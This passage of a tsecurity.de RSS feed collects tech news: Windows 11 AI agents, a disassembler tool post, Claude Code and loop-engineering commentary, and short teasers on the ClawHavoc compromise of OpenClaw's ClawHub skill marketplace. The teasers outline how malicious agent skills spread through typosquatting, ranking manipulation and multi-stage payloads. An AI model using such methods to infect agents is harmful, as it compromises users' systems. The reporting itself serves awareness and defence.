<link>https://tsecurity.de/de/3633299/it-security-nachrichten/microsoft-macht-windows-11-zum-ki-betriebssystem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633299/it-security-nachrichten/microsoft-macht-windows-11-zum-ki-betriebssystem/</guid>
<pubDate>Mon, 29 Jun 2026 17:37:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/Bildschirmfoto-2025-04-17-um-13.02.36.png?w=1024" alt="Windows 11" class="wp-image-3964675" width="1024" height="679" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Sprachgesteuerte, kontinuierlich laufende KI-Agenten sollen künftig die Arbeit mit Microsoft Windows vereinfachen.</p></figcaption></figure><p class="imageCredit">Melnikov Dmitriy / Shutterstock.com</p></div>



<p>Seit Jahren bewirbt Microsoft <a href="https://www.computerwoche.de/article/2827473/windows-11-schneller-machen.html" target="_blank">Windows 11</a> als Betriebssystem mit KI-Funktionen. Nun schafft das Unternehmen endlich die Voraussetzungen für diesen Wandel. So präsentierten die Redmonder auf der <a href="https://build.microsoft.com/en-US/home" target="_blank" rel="noreferrer noopener">Build-Konferenz</a> Anfang Juni 2026 Beispiele dafür, wie das Unternehmen Künstliche Intelligenz (KI) in Windows 11 integriert.</p>



<p>So sollen KI-Modelle und -Agenten das OS intelligenter machen und es Nutzern erlauben, in natürlicher Sprache mit dem System zu arbeiten.</p>



<h2 class="wp-block-heading">Lokale KI-Workloads werden Realität</h2>



<p>Konkret sollen Windows-11-PCs uneingeschränkte KI-Funktionen bieten, so dass Nutzer KI kostenlos und ohne Netzwerkverbindung verwenden können. Laut <a href="https://www.linkedin.com/in/anatarnousk/" target="_blank" rel="noreferrer noopener">Anastasiya Tarnouskaya</a>, Produktmanagerin für Windows ML, würden keine Token-Kosten entstehen und keine sensiblen Daten das Gerät verlassen. „Zudem verringert sich die Latenz“, erklärte sie während <a href="https://build.microsoft.com/en-US/sessions/BRK260?source=sessions" target="_blank" rel="noreferrer noopener">einer Build-Session</a>.</p>



<p>Hardwarehersteller hätten KI-fähige Hardware auf den Markt gebracht, noch bevor die entsprechenden Anwendungen verfügbar waren. Laut Tarnouskaya würden aber auf mehr als 500 Millionen PCs bereits lokale KI-Workloads ausgeführt. „Dank der jüngsten Fortschritte bei KI-Modellen, Hardware und den zugehörigen Software-Stacks wird heute jeder Windows-PC zunehmend KI-fähig“, sagte sie.</p>



<h2 class="wp-block-heading">Offline-KI statt Cloud-Chatbot</h2>



<p>Die KI-Funktionen sind dabei in Apps sowie in die Windows-Benutzeroberfläche integriert und beschränken sich nicht auf reine Chatbots, wie die Angebote von ChatGPT oder Gemini. So würden Microsoft Office, Fotos und Teams bereits KI-Funktionen nutzen, die direkt auf dem Gerät ausgeführt werden: Outlook fasst beispielsweise E-Mails mithilfe von Microsofts Phi-Silica-Modell und der GPU des PCs zusammen, so die Managerin.</p>



<p>Tarnouskaya zufolge setzten nicht nur Entwickler auf lokale KI. Auch Unternehmen wie Adobe, WhatsApp, Canva, Affinity und Speechify würden beeindruckende, KI-gestützte Anwendungen entwickeln.</p>



<p>KI-Apps für Windows 11 hätten laut der Managerin einen regelrechten Boom erleben, nachdem Microsoft im vergangenen Herbst Windows ML veröffentlicht hatte. Dabei handelt es sich um eine Plattform, die Developer dabei unterstützt, Offline-KI-Anwendungen zu erstellen, ohne auf Cloud-Modelle zugreifen zu müssen. Windows ML verknüpft Anwendungen, lokalisierte KI-Modelle und Hardware wie GPUs und neuronale Prozessoren.</p>



<h2 class="wp-block-heading">Agenten mit offenem Ohr</h2>



<p>Windows ML ist Teil des „Foundry“-Produktportfolios von Microsoft. Dazu zählt unter anderem Foundry Local, mit dem Open-Source-Modelle auf Windows-Geräten ausgeführt werden. Zudem gehören Windows-KI-APIs zu dieser Produktpalette, die etwa automatisiert Unterhaltungen zusammenfassen, Sprache erkennen und Videos hochskalieren.</p>



<p>Microsoft setzt darüber hinaus auf KI-Agenten, um die Art und Weise zu verändern, wie Nutzer mit Windows 11 interagieren: Beispielsweise können sie eine Aufgabe in natürlicher Sprache beschreiben. Ein kontinuierlich im Hintergrund laufender Agent übernimmt daraufhin und erledigt die Arbeit.</p>



<p>„Windows entwickelt sich zu einer Plattform, auf der natürliche Sprache konkrete Systemaktionen auslösen kann“, erklärte <a href="https://www.linkedin.com/in/samantha-song-b6271815a/" target="_blank" rel="noreferrer noopener">Samantha Song</a>, Produktmanagerin für Windows bei Microsoft. <a href="https://build.microsoft.com/en-US/sessions/OD858?source=sessions" target="_blank" rel="noreferrer noopener">Sie demonstrierte</a>, wie Nutzer einfach sagen oder eintippen können, wie sie Farben, Hintergrundbilder oder Menüs anpassen möchten. Der Agent nimmt dann die entsprechende Änderung vor. „Es ist keine manuelle Konfiguration von Designs, Einstellungen oder Beleuchtung erforderlich. Das System betrachtet den Vorgang als eine einzige, zusammenhängende Aktion“, erklärte die Produktmanagerin.</p>



<p>Damit das funktioniert, müssten Entwickler eine sogenannte „Skills-Datei“ erstellen, die das Verhalten des Agenten definiert. Diese Funktion lässt sich anschließend beliebig oft wiederverwenden, so Song. „Auf Unternehmensebene ist ein Szenario denkbar, in dem ein Benutzer in einen sicheren Finanzmodus wechselt und das System automatisch Apps, Zugriffsbereiche und die Umgebung darauf abstimmt“, ergänzt sie.</p>



<h2 class="wp-block-heading">Weitere Use Cases für Agenten</h2>



<p>Des Weiteren demonstrierte Microsoft auf der Build, wie sich mit OpenClaw personalisierte Agenten erstellen lassen, um Windows-Funktionen auszuführen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Vertreter des KI-Frameworks LLMware.ai zeigten <a href="https://build.microsoft.com/en-US/sessions/DEMSP380?source=sessions" target="_blank" rel="noreferrer noopener">einen Agenten auf einem Qualcomm-Laptop</a>, der Jira-Issues in Echtzeit aufnimmt, lokal zusammenfasst und täglich die wichtigsten Issues gebündelt per E-Mail an das Team sendet. Der Agent arbeitet automatisch, ohne dass ein Prompt erforderlich ist.</p>



<p>Die Leistung der NPU [Neural Processing Unit] lässt sich laut <a href="https://www.linkedin.com/in/darren-oberst-34a4b54/" target="_blank" rel="noreferrer noopener">Darren Oberst</a>, Mitbegründer von LLMWare.ai, optimieren, indem man das Modell lokal ausführt und einen Zeitplan für den Betrieb der automatisierten Agenten implementiert.</p>



<p>„Samsung, Lenovo und andere führen – wenn auch langsam und behutsam – Funktionen für agentenbasierte KI unter der Bezeichnung ‚Personal AI‘ ein“, erklärte <a href="https://www.linkedin.com/in/leonard-lee-nextcurve/" target="_blank" rel="noreferrer noopener">Leonard Lee</a>, Principal Analyst bei Next Curve. „Die Herausforderung besteht darin, einen sicheren Einsatz zu gewährleisten“, fügte er hinzu.</p>



<h2 class="wp-block-heading">KI-PCs verändern Angebot und Beschaffung</h2>



<p>Microsofts Bestrebungen, KI in Windows zu integrieren, werden Unternehmen dazu zwingen, ihre Hardware-Strategien zu überdenken, so <a href="https://www.linkedin.com/in/jckgld/" target="_blank" rel="noreferrer noopener">Jack Gold</a>, Principal Analyst bei J. Gold Associates. Da KI-Chips bei unterschiedlichen Aufgaben ihre Stärken ausspielen, werde Microsoft zudem mehrere Chip-Typen unterstützen müssen, um den Unternehmen eine Auswahl zu bieten, erklärte er. Der Marktforscher empfiehlt bei der Anschaffung neuer PCs, insbesondere im Unternehmensbereich, diesen Aspekt zu berücksichtigen und im Rahmen von Upgrade-Zyklen auf KI-PCs zu setzen. (tf) </p>



<p>Dieser Artikel basiert auf einem Beitrag von <a href="https://www.computerworld.com/article/4189045/microsoft-is-turning-windows-11-into-an-ai-operating-system.html" target="_blank">Computerworld.com</a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHavoc Attack Hits ClawHub With 1,184 Malicious Skills and 247,000 Installations]]></title>
<description><![CDATA[The AI-agent ecosystem experienced its largest supply-chain compromise to date when ClawHavoc detonated across ClawHub, the official skill marketplace for OpenClaw. Our full AIG-powered scan of nearly 50,000 ClawHub Skills found 1,184 clearly malicious packages tied to 12 compromised publisher…
R...]]></description>
<link>https://tsecurity.de/de/3632700/it-security-nachrichten/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632700/it-security-nachrichten/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/</guid>
<pubDate>Mon, 29 Jun 2026 13:08:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The AI-agent ecosystem experienced its largest supply-chain compromise to date when ClawHavoc detonated across ClawHub, the official skill marketplace for OpenClaw. Our full AIG-powered scan of nearly 50,000 ClawHub Skills found 1,184 clearly malicious packages tied to 12 compromised publisher…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/">ClawHavoc Attack Hits ClawHub With 1,184 Malicious Skills and 247,000 Installations</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHavoc Attack Hits ClawHub With 1,184 Malicious Skills and 247,000 Installations]]></title>
<description><![CDATA[The AI-agent ecosystem experienced its largest supply-chain compromise to date when ClawHavoc detonated across ClawHub, the official skill marketplace for OpenClaw. Our full AIG-powered scan of nearly 50,000 ClawHub Skills found 1,184 clearly malicious packages tied to 12 compromised publisher ac...]]></description>
<link>https://tsecurity.de/de/3632674/it-security-nachrichten/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632674/it-security-nachrichten/clawhavoc-attack-hits-clawhub-with-1184-malicious-skills-and-247000-installations/</guid>
<pubDate>Mon, 29 Jun 2026 12:52:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The AI-agent ecosystem experienced its largest supply-chain compromise to date when ClawHavoc detonated across ClawHub, the official skill marketplace for OpenClaw. Our full AIG-powered scan of nearly 50,000 ClawHub Skills found 1,184 clearly malicious packages tied to 12 compromised publisher accounts and confirmed 247,693 installations. The campaign combined typosquatting, ranking manipulation, and multi-stage payload delivery […]</p>
<p>The post <a href="https://gbhackers.com/clawhavoc-attack-hits-clawhub/">ClawHavoc Attack Hits ClawHub With 1,184 Malicious Skills and 247,000 Installations</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHub Ranking Manipulation Lets Malicious Skills Automatically Infect AI Agents]]></title>
<description><![CDATA[The explosive growth of OpenClaw in early 2026 has transformed AI from a simple query tool into a powerful automated assistant. Agent Skills allow these AI systems to acquire new capabilities. However, they have also become a prime entry point for attackers. A recent scan of over 50,000 skills on...]]></description>
<link>https://tsecurity.de/de/3632574/it-security-nachrichten/clawhub-ranking-manipulation-lets-malicious-skills-automatically-infect-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632574/it-security-nachrichten/clawhub-ranking-manipulation-lets-malicious-skills-automatically-infect-ai-agents/</guid>
<pubDate>Mon, 29 Jun 2026 12:08:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The explosive growth of OpenClaw in early 2026 has transformed AI from a simple query tool into a powerful automated assistant. Agent Skills allow these AI systems to acquire new capabilities. However, they have also become a prime entry point for attackers. A recent scan of over 50,000 skills on ClawHub, OpenClaw’s official marketplace, revealed […]</p>
<p>The post <a href="https://cyberpress.org/clawhub-skills-infect-agents/">ClawHub Ranking Manipulation Lets Malicious Skills Automatically Infect AI Agents</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built a executable analysis and patching tool - looking for feedback]]></title>
<description><![CDATA[Hi,  I have been developing a Windows tool called **VAXD - VMA Executable Disassembler**.  It is intended as a lightweight executable analysis and patch-assistance tool, mainly for quickly inspecting unknown or suspicious binaries, old software, packed/unusual files, and PE executables without th...]]></description>
<link>https://tsecurity.de/de/3632382/malware-trojaner-viren/i-built-a-executable-analysis-and-patching-tool-looking-for-feedback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632382/malware-trojaner-viren/i-built-a-executable-analysis-and-patching-tool-looking-for-feedback/</guid>
<pubDate>Mon, 29 Jun 2026 11:03:41 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi, </p> <p>I have been developing a Windows tool called **VAXD - VMA Executable Disassembler**. </p> <p>It is intended as a lightweight executable analysis and patch-assistance tool, mainly for quickly inspecting unknown or suspicious binaries, old software, packed/unusual files, and PE executables without the complexity of a full reverse-engineering suite. </p> <p>Current features include: </p> <p>- PE EXE/DLL inspection<br> - x86/x64 disassembly<br> - Multi-CPU disassembly support for several firmware/binary formats<br> - Strings extraction and cross-references<br> - Function navigation<br> - Hex view and byte-level inspection<br> - Patch planning and patched-file output<br> - Jump/branch patching workflows<br> - .NET WinForms visual reconstruction<br> - Basic .NET decompiler/editor workflow<br> - VB5/VB6 form preview/extraction work in progress </p> <p>My goal is not to replace advanced tools, but to make common executable inspection tasks faster and more accessible, especially for analysts who want to quickly understand what a binary is doing before deciding whether deeper analysis is needed. </p> <p>I would appreciate honest feedback from people doing malware analysis or reverse engineering: </p> <p>- Does this workflow make sense?<br> - Which features would be useful in real malware triage?<br> - What would immediately make you distrust or reject such a tool?<br> - What would you expect before testing it on suspicious samples?<br> - Are there specific analysis views or reports that would be valuable? </p> <p>Project/page:<br> <a href="https://vma-broadcast.com/vaxd-vma-executable-disassembler/">https://vma-broadcast.com/vaxd-vma-executable-disassembler/</a> </p> <p>Thanks.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Bicurico"> /u/Bicurico </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uin0hn/i_built_a_executable_analysis_and_patching_tool/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uin0hn/i_built_a_executable_analysis_and_patching_tool/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.6.11-beta.2]]></title>
<description><![CDATA[openclaw 2026.6.11-beta.2]]></description>
<link>https://tsecurity.de/de/3631574/downloads/v2026611-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631574/downloads/v2026611-beta2/</guid>
<pubDate>Sun, 28 Jun 2026 23:31:46 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>openclaw 2026.6.11-beta.2</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Code turned every engineer into three. Now companies need more product thinkers]]></title>
<description><![CDATA[Anthropic recently told its growth team to hire more product managers, not fewer. The reason, as reported in industry coverage, was that Claude Code had quietly turned its engineering org into a team that ships at roughly three times its actual headcount, and the bottleneck moved from the integra...]]></description>
<link>https://tsecurity.de/de/3630129/it-nachrichten/claude-code-turned-every-engineer-into-three-now-companies-need-more-product-thinkers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630129/it-nachrichten/claude-code-turned-every-engineer-into-three-now-companies-need-more-product-thinkers/</guid>
<pubDate>Sat, 27 Jun 2026 21:47:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic recently told its growth team to hire more product managers, not fewer. The reason, as reported in industry coverage, was that Claude Code had quietly turned its engineering org into a team that ships at roughly three times its actual headcount, and the bottleneck moved from the integrated development environment (IDE) to the people deciding what to build.</p><p>That detail is easy to miss in the noise of every <a href="https://venturebeat.com/orchestration/vibe-coding-can-build-your-pipeline-it-cant-explain-it-six-months-later">AI productivity claim</a>. It is also the structural shift the rest of the industry is now living through. The bottleneck in software is no longer typing. It is deciding what to type. And the engineers who treat that as someone else's problem are about to plateau. </p><p>For most of the last decade, that decision sat with someone else. <a href="https://venturebeat.com/technology/agentic-ai-solved-coding-and-exposed-every-other-problem-in-software-engineering">Software engineering</a> was a craft you absorbed slowly, then practiced in a long, predictable sequence: Dive deep on the technology, write the code, ask Stack Overflow when stuck, escalate to a senior engineer when Stack Overflow failed, ship the ticket. The product manager owned the funnel. The engineer owned the build. Both sides treated this division as physics.</p><p>Then the funnel collapsed in five steps.</p><h2><b>A short history of how the engineer's day got compressed</b></h2><p><b>The Stack Overflow era (2014 to late 2022): </b>The way engineers thought lived in one place. But new monthly questions on Stack Overflow are now down <a href="https://www.reddit.com/r/programming/comments/1hwg2px/stackoverflow_has_lost_77_of_new_questions/">roughly 77%</a> since November 2022, which was not coincidentally when ChatGPT launched. The drop is not a referendum on the site. It is a referendum on the workflow it represented.</p><p><b>The browser-tab era (late 2022 to 2024):</b> The first ChatGPT generation sat outside the IDE. Engineers ran the same loop they had always run, just with a faster oracle: Write a prompt in a browser, paste the answer back into VS Code, repeat. The work was still single-threaded and engineer-driven. The leverage was real but local.</p><p><b>The IDE-native era (2024 to 2025):</b> Cursor and Claude Code moved the model inside the editor and gave it access to the full repository. The senior-engineer escalation path largely dissolved. For years, the prevailing wisdom among veteran engineers was that Bash had the longest shelf life of any tool in the stack. By 2026, for a meaningful share of working developers, the first command typed in a fresh terminal is claude.</p><p><b>The spec-driven era (2025 to 2026):</b> Larger context windows turned single-session work into something that previously required tickets, design docs, and sprints. Amazon's Kiro IDE team reportedly compressed feature builds from two weeks to two days using the same spec-driven workflow they were shipping. An AWS engineering team described an 18-month rearchitecture, originally scoped for 30 engineers, was completed by 6 people in 76 days. The bottleneck stopped being how long it takes to write the code. It started being how clearly the team can describe what correct looks like.</p><p><b>The routines era (2026):</b> In April, Anthropic shipped Claude Code Routines: Scheduled, persistent agents that run on a cadence, on a webhook, or overnight while the laptop is closed. Cron came back. Hooks came back. The engineer's job is now part orchestration: Spin up a swarm before bed, review a stack of pull requests in the morning. Third-party wrappers like OpenClaw, which was briefly suspended by Anthropic in April before partial reinstatement, made the same point from the open-source side.</p><h2><b>The bottleneck moved; most teams have not</b></h2><p>Engineering has roughly tripled. Product management has not budged. The traditional 1:8 ratio of PMs to engineers, already strained, now plays out closer to an effective 1:20 because each engineer ships more per day. For instance, LinkedIn replaced its associate product manager track with a "Product Builder" program that trains generalists across product, design, and engineering. Anthropic is hiring more PMs, not fewer. The pattern is consistent across companies that have actually deployed agentic workflows in production: The system is producing built features faster than it is producing decisions about what should be built.</p><p>For engineers, this is the most important career signal of the decade, and the easiest one to miss while the productivity stories dominate the feed.</p><h2><b>First principles matter more, not less</b></h2><p>The instinct to declare fundamentals obsolete in the agent era gets the trend exactly wrong.</p><p>When a memory leak takes down production at 3 a.m., and the cause turns out to be a subtle ownership bug pushed 4 years ago, no agent currently in the wild closes that loop end-to-end. Operating systems, networks, concurrency, and query plans still decide who can resolve a real incident. They also decide who can spot the moments when an <a href="https://venturebeat.com/technology/why-prompt-debt-retrieval-debt-and-evaluation-debt-are-quietly-reshaping-enterprise-ai-risk">agent's output</a> looks correct on the surface and is quietly, expensively, wrong underneath. The agent that wrote 70% of the code in a modern repo cannot reliably tell anyone where its assumptions about thread safety, memory ownership, or transaction isolation diverged from the runtime. The engineer who can read the diff and catch that is the engineer the rest of the team needs in the room, and that engineer is built on fundamentals, not on prompting skill.</p><p>The corollary is that fundamentals are now a leverage skill, not a hygiene skill. In 2014, knowing how a TCP retransmit worked got a debug ticket closed faster. In 2026, the same knowledge keeps an entire agent-driven release pipeline from shipping a regression at scale. The blast radius of the engineer who knows what is happening underneath has gone up, not down.</p><h2><b>Review is the new writing</b></h2><p>Engineers in 2026 generate code at a rate that exceeds what any of them can read carefully. The team that ships fast and survives is the team whose engineers treat reviewing AI-generated code with at least the same rigor they once reserved for writing it. The 2025 <a href="https://survey.stackoverflow.co/2025">Stack Overflow developer survey</a> put 84% of developers on AI tools, with 46% saying they do not trust the output, up sharply from 31% the year before. That gap, heavy use paired with low trust, is exactly where review skills now matter most. Coders who push lots and review little are accumulating a debt that will come due during the first real incident, and the engineer who can pay it back is the one who paired their volume with deep first-principles knowledge of the systems involved.</p><h2><b>The new differentiator is the product funnel</b></h2><p>Both of those are necessary. Neither is sufficient. The engineer who matters in 2026 is the one who has stopped waiting for the funnel to arrive in the form of a Jira ticket.</p><p>That means doing things the role was historically allowed to skip.</p><p>Talk to customers. Watch how they actually use the product. Read the support queue. Sit in on the sales call. The signal a product team gets through three layers of summary, an engineer can now get firsthand in an afternoon.</p><p>Generate ideas, not just estimates. The product manager who used to source ideas for 8 engineers cannot source ideas for 20 at the same fidelity. The engineer who shows up with a validated, scoped opportunity is no longer doing the PM's job. The engineer is doing the job the new ratio requires.</p><p>Work backwards from the customer. Amazon has been writing the press release first for two decades. The discipline travels well to teams of one and to swarms of agents. Both produce a great deal of working software in the wrong direction without a clear statement of what "customer wins" means before any code is written.</p><p>Stop hiding behind bandwidth. The honest answer to "Do you have capacity for this idea?" used to be 'No.' With routines, hooks, and a cooperative agent stack, the honest answer is closer to "What is the idea worth?" That is a different conversation, and a much harder one to have without a real point of view on the customer.</p><h2><b>What the next decade rewards</b></h2><p>The five-phase history above is not really a history of tools. It is a history of which part of the job a human had to do. The part that is still human, and that will remain human for the foreseeable future, has moved up the funnel: From typing, to reviewing, to deciding, to choosing the customer to serve and the problem to solve.</p><p>The 2026 version of a <a href="https://venturebeat.com/technology/the-enterprise-risk-nobody-is-modeling-ai-is-replacing-the-very-experts-it-needs-to-learn-from">great engineer</a> is not the one who writes the most code. It is the one who knows what to build, can prove it is worth building, and has the agent fleet plus the review discipline to ship it without the system collapsing under its own velocity.</p><p>Engineers who internalize this will spend the next decade doing the most interesting work software has ever produced. Engineers who wait for a ticket will spend it watching the ticket get written by the agent next to them.</p><p><i>Ishan Gupta is a software engineer at Amazon.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget Prompt Engineering: 'Loop Engineering' Is All the Rage Now]]></title>
<description><![CDATA[An anonymous reader quotes a report from Business Insider: For the most powerful voices in AI, it's all about being in the loop. Claude Code creator Boris Cherny recently said he doesn't write his own AI prompts much anymore. Thanks to loops, he doesn't have to. "It's an agent that prompts Claude...]]></description>
<link>https://tsecurity.de/de/3629822/it-security-nachrichten/forget-prompt-engineering-loop-engineering-is-all-the-rage-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629822/it-security-nachrichten/forget-prompt-engineering-loop-engineering-is-all-the-rage-now/</guid>
<pubDate>Sat, 27 Jun 2026 17:50:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Business Insider: For the most powerful voices in AI, it's all about being in the loop. Claude Code creator Boris Cherny recently said he doesn't write his own AI prompts much anymore. Thanks to loops, he doesn't have to. "It's an agent that prompts Claude," Cherny recently told CNBC, adding, "I don't write the prompt anymore. Claude writes the prompt, and now I'm talking to that new Claude that is kind of coordinating." In the same interview, Cherny said that loops and a similar feature were examples of the kind of work he would be proudest of in a decade.
 
Cherny isn't the only one embracing "loop engineering." OpenAI engineer Peter Steinberger, the creator of the viral OpenClaw project, wrote a public reminder to users who are still writing out prompts for AI agents. "Here's your monthly reminder that you shouldn't be prompting coding agents anymore," Steinberger wrote recently on X. "You should be designing loops that prompt your agents." [...] Steinberger shared an example of a loop he uses: "Tell codex to maintain your repos, wake up every 5 minutes and direct work to threads. That makes it easy to parallelize+steer work as needed." Claire Vo, founder of ChatPRD and host of the "How I AI," said, "it's really just reminding people that you don't have to use your human fingers to type in a prompt in order for your agent to do work on your behalf."
 
The days of directly prompting generative AI coding tools are "kind of over, or at least some think it's going to be," Addy Osmani, director of Google Cloud, wrote in his post explaining the concept.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Forget+Prompt+Engineering%3A+'Loop+Engineering'+Is+All+the+Rage+Now%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F25%2F0546238%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F25%2F0546238%2Fforget-prompt-engineering-loop-engineering-is-all-the-rage-now%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/06/25/0546238/forget-prompt-engineering-loop-engineering-is-all-the-rage-now?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Project IGI (1999) reverse engineering - partial docs, honest about gaps]]></title>
<description><![CDATA[submitted by    /u/Inner-Combination177   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3628762/reverse-engineering/project-igi-1999-reverse-engineering-partial-docs-honest-about-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628762/reverse-engineering/project-igi-1999-reverse-engineering-partial-docs-honest-about-gaps/</guid>
<pubDate>Sat, 27 Jun 2026 02:09:31 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Inner-Combination177"> /u/Inner-Combination177 </a> <br> <span><a href="https://github.com/flawme/igi-reverse-engineering">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1ugce2z/project_igi_1999_reverse_engineering_partial_docs/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Openclaw And The Agentic AI Inflection Point: From “Cool Demo” To Governed Infrastructure]]></title>
<description><![CDATA[OpenClaw’s rapid adoption, and the ecosystem forming around it, signal a shift in how AI is used at work. These platforms are accelerating “agentic” capabilities: systems that do more than...
The post Openclaw And The Agentic AI Inflection Point: From “Cool Demo” To Governed Infrastructure appear...]]></description>
<link>https://tsecurity.de/de/3627891/it-security-nachrichten/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627891/it-security-nachrichten/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/</guid>
<pubDate>Fri, 26 Jun 2026 17:54:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1024" height="768" src="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/06/OpenClaw-and-the-Agentic-AI-Inflection-Point-From-Cool-Demo-to-Governed-Infrastructure.png.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/06/OpenClaw-and-the-Agentic-AI-Inflection-Point-From-Cool-Demo-to-Governed-Infrastructure.png.jpg 1024w, https://www.cyberdefensemagazine.com/wp-content/uploads/2026/06/OpenClaw-and-the-Agentic-AI-Inflection-Point-From-Cool-Demo-to-Governed-Infrastructure.png-768x576.jpg 768w" sizes="(max-width: 1024px) 100vw, 1024px"><p>OpenClaw’s rapid adoption, and the ecosystem forming around it, signal a shift in how AI is used at work. These platforms are accelerating “agentic” capabilities: systems that do more than...</p>
<p>The post <a href="https://www.cyberdefensemagazine.com/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/" data-wpel-link="internal">Openclaw And The Agentic AI Inflection Point: From “Cool Demo” To Governed Infrastructure</a> appeared first on <a href="https://www.cyberdefensemagazine.com/" data-wpel-link="internal">Cyber Defense Magazine</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Openclaw And The Agentic AI Inflection Point: From “Cool Demo” To Governed Infrastructure]]></title>
<description><![CDATA[OpenClaw’s rapid adoption, and the ecosystem forming around it, signal a shift in how AI is used at work. These platforms are accelerating “agentic” capabilities: systems that do more than… The post Openclaw And The Agentic AI Inflection Point: From…
Read more →
The post Openclaw And The Agentic ...]]></description>
<link>https://tsecurity.de/de/3627887/it-security-nachrichten/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627887/it-security-nachrichten/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/</guid>
<pubDate>Fri, 26 Jun 2026 17:54:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
